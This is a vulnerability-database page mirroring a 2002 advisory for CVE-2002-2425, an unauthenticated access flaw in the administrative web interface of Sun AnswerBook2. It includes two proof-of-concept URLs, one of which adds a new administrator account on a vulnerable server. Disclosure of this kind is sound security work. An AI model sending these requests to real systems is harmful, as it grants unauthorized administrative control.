Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2002-2425

Publish Date: 02 Aug 2002

Author: ghandi

                							

                source: http://www.securityfocus.com/bid/5383/info

Sun Microsystems AnswerBook2 allows users to view Sun documentation through a web browser, and is available for Solaris.

AnswerBook2 includes an administrative web interface. Reportedly, it is possible to access these scripts without authorization, and add a new administrative user of the AnswerBook2 system. 

http://localhost:8888/ab2/@AdminViewError

http://localhost:8888/ab2/@AdminAddadmin?uid=foo&amp;password=bar&amp;re_password=bar

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Sun AnswerBook2 1.x - Unauthorized Administrative Script Access

Vulmon Search

About

Products

Connect